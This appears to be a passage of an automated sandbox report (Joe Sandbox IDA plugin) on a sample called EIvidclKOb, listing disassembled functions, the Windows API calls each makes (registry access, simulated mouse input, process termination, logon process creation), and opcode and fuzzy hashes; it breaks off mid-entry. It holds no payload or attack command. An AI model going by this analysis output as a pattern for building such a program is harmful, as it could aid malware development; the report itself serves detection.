Instruction Fuzzy Hash: 6811B6B251021DBFEF159F64CC85EE77F5DEF087A8F114115B604A60A0DA72DC21EBA4

Function 00F29AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00F29AE6

Part of subcall function 00F23187: EncodePointer.KERNEL32(00000000), ref: 00F2318A
Part of subcall function 00F23187: __initp_misc_winsig.LIBCMT ref: 00F231A5
Part of subcall function 00F23187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F29EA0
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F29EB4
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F29EC7
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F29EDA
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F29EED
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F29F00
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00F29F13
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F29F26
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F29F39
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F29F4C
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F29F5F
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F29F72
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F29F85
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F29F98
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F29FAB
Part of subcall function 00F23187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F29FBE

__mtinitlocks.LIBCMT ref: 00F29AEB
__mtterm.LIBCMT ref: 00F29AF4

Part of subcall function 00F29B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00F29AF9,00F27CD0,00FBA0B8,00000014), ref: 00F29C56
Part of subcall function 00F29B5C: _free.LIBCMT ref: 00F29C5D
Part of subcall function 00F29B5C: DeleteCriticalSection.KERNEL32(00FBEC00,?,?,00F29AF9,00F27CD0,00FBA0B8,00000014), ref: 00F29C7F

__calloc_crt.LIBCMT ref: 00F29B19
__initptd.LIBCMT ref: 00F29B3B
GetCurrentThreadId.KERNEL32 ref: 00F29B42

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 9d70ebc55666451be5b2c4d71a9ae6d18dffccb006e1cf8c1130869942bbfdfb
Instruction ID: f1580c3e4fcaebab6ec69ffc1864aee938d7ce5df44ec46768fab7c967c96750
Opcode Fuzzy Hash: 9d70ebc55666451be5b2c4d71a9ae6d18dffccb006e1cf8c1130869942bbfdfb
Instruction Fuzzy Hash: 89F09032A1D7315AE6347774BC0769A3690EF42730F200A19F4A4D71D3EFE9854179A4

Function 00F2406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00F23F85), ref: 00F24085
GetProcAddress.KERNEL32(00000000), ref: 00F2408C
EncodePointer.KERNEL32(00000000), ref: 00F24097
DecodePointer.KERNEL32(00F23F85), ref: 00F240B2

Strings

combase.dll, xrefs: 00F24080
RoUninitialize, xrefs: 00F24074

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 2262de7bf8d31dca054121993582007aeb1322964b6bf54f34753c1bada089d9
Instruction ID: 636b0511e09becce6278d87a10000eaae82ed04db4dfd5a72e4555d13a74e774
Opcode Fuzzy Hash: 2262de7bf8d31dca054121993582007aeb1322964b6bf54f34753c1bada089d9
Instruction Fuzzy Hash: EBE0EC70D81308EFEB50AF62FE0EF953AA4B704782F148025F101E60A0CBB79648FB15

Function 00F664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00F6660B
_memmove.LIBCMT ref: 00F66546

Part of subcall function 00F09837: __itow.LIBCMT ref: 00F09862
Part of subcall function 00F09837: __swprintf.LIBCMT ref: 00F098AC

_memmove.LIBCMT ref: 00F665B9
_memmove.LIBCMT ref: 00F666A0
_memmove.LIBCMT ref: 00F666B9
_memmove.LIBCMT ref: 00F666D5

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 06c3e0da596de7e5ebd166ea91c544cb533233ce1895cc83c049d75c6dd0b7a7
Instruction ID: 66ed98ad517b4a2b2bfbaa6b8cce9ba577eb2d17e3f60a6919f5ef978a928216
Opcode Fuzzy Hash: 06c3e0da596de7e5ebd166ea91c544cb533233ce1895cc83c049d75c6dd0b7a7
Instruction Fuzzy Hash: 2161BA7190065A9BCF01EF60DC82AFE37A5AF05308F448558F856AB293EB79EC05FB50

Function 00F801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Part of subcall function 00F80E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F7FDAD,?,?), ref: 00F80E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F802BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F802FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F80320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F80349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F8038C
RegCloseKey.ADVAPI32(00000000), ref: 00F80399

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: 52600799ba9b1e3a5176db3bea1bc02265e32dc4c2ea88cb71f244dddc7eb266
Instruction ID: 9f8735c450d0eb1e8896957dba8c9dacccacc89a7b846caddc6682b03683e1be
Opcode Fuzzy Hash: 52600799ba9b1e3a5176db3bea1bc02265e32dc4c2ea88cb71f244dddc7eb266
Instruction Fuzzy Hash: 72515831608204AFC710EF64CC85EABBBE8FF85314F44491DF995872A2DB75E909EB52

Function 00F85799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00F857FB
GetMenuItemCount.USER32(00000000), ref: 00F85832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F8585A
GetMenuItemID.USER32(?,?), ref: 00F858C9
GetSubMenu.USER32(?,?), ref: 00F858D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 00F85928

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 8f4c87348ae651bdbcda40e7baafad0054fd10e2b5e06f0fd45729b61ad2cf15
Instruction ID: 89d505ac490b4f4ecfb247070dd5bf52da3726193507fe916f5a33fa13c4af15
Opcode Fuzzy Hash: 8f4c87348ae651bdbcda40e7baafad0054fd10e2b5e06f0fd45729b61ad2cf15
Instruction Fuzzy Hash: FA515D75E00615EFCF11EF64C845AEEB7B4EF48720F14406AE811BB351DB74AE41AB90

Function 00F5EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F5EF06
VariantClear.OLEAUT32(00000013), ref: 00F5EF78
VariantClear.OLEAUT32(00000000), ref: 00F5EFD3
_memmove.LIBCMT ref: 00F5EFFD
VariantClear.OLEAUT32(?), ref: 00F5F04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F5F078

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 9779100c20381f4d0890b9a35e15774b576cb049938e9aa9420eb1100c9f645f
Instruction ID: ca1257674d924b37f8fd54a7b9e0b8a97d222978a4c180ffa5601df8c0d3e2d9
Opcode Fuzzy Hash: 9779100c20381f4d0890b9a35e15774b576cb049938e9aa9420eb1100c9f645f
Instruction Fuzzy Hash: 1A516CB5A00209DFCB14CF58C884AAAB7F8FF4C314B15856AEE59DB345E734E915CBA0

Function 00F6220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F62258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F622A3
IsMenu.USER32(00000000), ref: 00F622C3
CreatePopupMenu.USER32 ref: 00F622F7
GetMenuItemCount.USER32(000000FF), ref: 00F62355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F62386

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: ef3f1847cbff8d5711b2c4763c3337f522cc6445003feaecb978de3dafbb727e
Instruction ID: 9e48ad41b37f5776c36255786979e2ee5a268327eb419b4880a109f7eeb7a4f6
Opcode Fuzzy Hash: ef3f1847cbff8d5711b2c4763c3337f522cc6445003feaecb978de3dafbb727e
Instruction Fuzzy Hash: 9051CF70A00B4AEFDF61CF68C889BADBBF5BF05324F144129E815AB391D7788944EB51

Function 00F01765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00F0179A
GetWindowRect.USER32(?,?), ref: 00F017FE
ScreenToClient.USER32(?,?), ref: 00F0181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F0182C
EndPaint.USER32(?,?), ref: 00F01876

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 4a13dcb5417a29af3667bfeb9263bc685d95a2dba5505db2770c2704bfdfa844
Instruction ID: d4cd30c1babcdbb66c103342e6df753d6b6b2c4f2b9dc7f0ff8c79fb44b389b2
Opcode Fuzzy Hash: 4a13dcb5417a29af3667bfeb9263bc685d95a2dba5505db2770c2704bfdfa844
Instruction Fuzzy Hash: 0C417B31504604AFD710DF24CC89FBA7BE8FB4A724F144629FAA48B2E1D731A945FB61

Function 00F8B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00FC57B0,00000000,018B54C8,?,?,00FC57B0,?,00F8B5A8,?,?), ref: 00F8B712
EnableWindow.USER32(00000000,00000000), ref: 00F8B736
ShowWindow.USER32(00FC57B0,00000000,018B54C8,?,?,00FC57B0,?,00F8B5A8,?,?), ref: 00F8B796
ShowWindow.USER32(00000000,00000004,?,00F8B5A8,?,?), ref: 00F8B7A8
EnableWindow.USER32(00000000,00000001), ref: 00F8B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F8B7EF

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: f04233dea95c789fd4e3f50f0a5358a37a650c315f8dbd21131d6f325cc2b72e
Instruction ID: 4f2ac1f03f9eab722e162f7a7ece04fa8ad92f28ff0da33b417b02b61587bba5
Opcode Fuzzy Hash: f04233dea95c789fd4e3f50f0a5358a37a650c315f8dbd21131d6f325cc2b72e
Instruction Fuzzy Hash: 4F418634A00344AFDB21DF24C499BD97BE1FF49320F5841B9F9488F6A2C731A85AEB50

Function 00F7709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00F74E41,?,?,00000000,00000001), ref: 00F770AC

Part of subcall function 00F739A0: GetWindowRect.USER32(?,?), ref: 00F739B3

GetDesktopWindow.USER32 ref: 00F770D6
GetWindowRect.USER32(00000000), ref: 00F770DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F7710F

Part of subcall function 00F65244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F652BC

GetCursorPos.USER32(?), ref: 00F7713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F77199

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 16933a60f6ac59c754136d1ea13fdf8a404f68cfb40465792839d4e2514caa2f
Instruction ID: 885d33c5581a2a5995ac81081fd5a60a32290a92e45dbdadb8198e4f8a12b1b6
Opcode Fuzzy Hash: 16933a60f6ac59c754136d1ea13fdf8a404f68cfb40465792839d4e2514caa2f
Instruction Fuzzy Hash: C831D472505309AFD720EF14DC49F9BB7AAFF88314F00091AF58997191C774EA09DB92

Function 00F58879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F580C0
Part of subcall function 00F580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F580CA
Part of subcall function 00F580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F580D9
Part of subcall function 00F580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F580E0
Part of subcall function 00F580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F580F6

GetLengthSid.ADVAPI32(?,00000000,00F5842F), ref: 00F588CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00F588D6
HeapAlloc.KERNEL32(00000000), ref: 00F588DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 00F588F6
GetProcessHeap.KERNEL32(00000000,00000000,00F5842F), ref: 00F5890A
HeapFree.KERNEL32(00000000), ref: 00F58911

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 7e5120b0a268fa1dd05becad80ffdd62fcbfb4732e9765797ca66c2422a668a3
Instruction ID: d4088d442535d61e39f63c30cc5a0d32977b8489d6793b26a5d84095c756710d
Opcode Fuzzy Hash: 7e5120b0a268fa1dd05becad80ffdd62fcbfb4732e9765797ca66c2422a668a3
Instruction Fuzzy Hash: B511B431901609FFDB109F94DC09BFE7B68EB44766F104028E945E7111CB32AD1AEB60

Function 00F585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F585E2
OpenProcessToken.ADVAPI32(00000000), ref: 00F585E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F585F8
CloseHandle.KERNEL32(00000004), ref: 00F58603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F58632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00F58646

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 36a58f87283a196c49b80eb41da2b8bd05c5fd2a185b97d9cf2459eb35102c5c
Instruction ID: 3f158d0047b9f8859c6339e84ccf95bcbf553b35a90a61f347ddd021ec8580e4
Opcode Fuzzy Hash: 36a58f87283a196c49b80eb41da2b8bd05c5fd2a185b97d9cf2459eb35102c5c
Instruction Fuzzy Hash: F911597250120DAFDF018FA4DD49BEE7BA9EF08365F144064FE05A2160C7728E69EB60

Function 00F5B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00F5B7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 00F5B7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F5B7CD
ReleaseDC.USER32(00000000,00000000), ref: 00F5B7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F5B7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 00F5B7FE

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 04aaf6fcb2eb087428ac01fe52fbacc6cc283887703d23ce2cdbf136d1a485c5
Instruction ID: e76be02ccb37f2413483f381c953a2bf1a1290bab80778b5746d9e8b58ca7fd1
Opcode Fuzzy Hash: 04aaf6fcb2eb087428ac01fe52fbacc6cc283887703d23ce2cdbf136d1a485c5
Instruction Fuzzy Hash: E2017175E00209BFEF109BA69C49A5ABFA8EB48321F004065FE04A7291D6309C14DF90

Function 00F20162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00F20193
MapVirtualKeyW.USER32(00000010,00000000), ref: 00F2019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00F201A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00F201B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00F201B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F201C1

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111260867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111274938.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_EIvidclKOb.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 1fb907c591ff4ef87cc0a84507b572204c1121baa70d9c33efad65224397a5ff
Instruction ID: b63b1ed99d3558e57c06ccf037da18100162a780460c0466a8eff19ff6934dc8
Opcode Fuzzy Hash: 1fb907c591ff4ef87cc0a84507b572204c1121baa70d9c33efad65224397a5ff
Instruction Fuzzy Hash: 19016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C87941C7F5A868CBE5

Function 00F653E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F653F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F6540F
GetWindowThreadProcessId.USER32(?,?), ref: 00F6541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F6542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F65437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F6543E

Memory Dump Source

Source File: 00000000.00000002.2110569046.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.2110405390.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2111103495.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
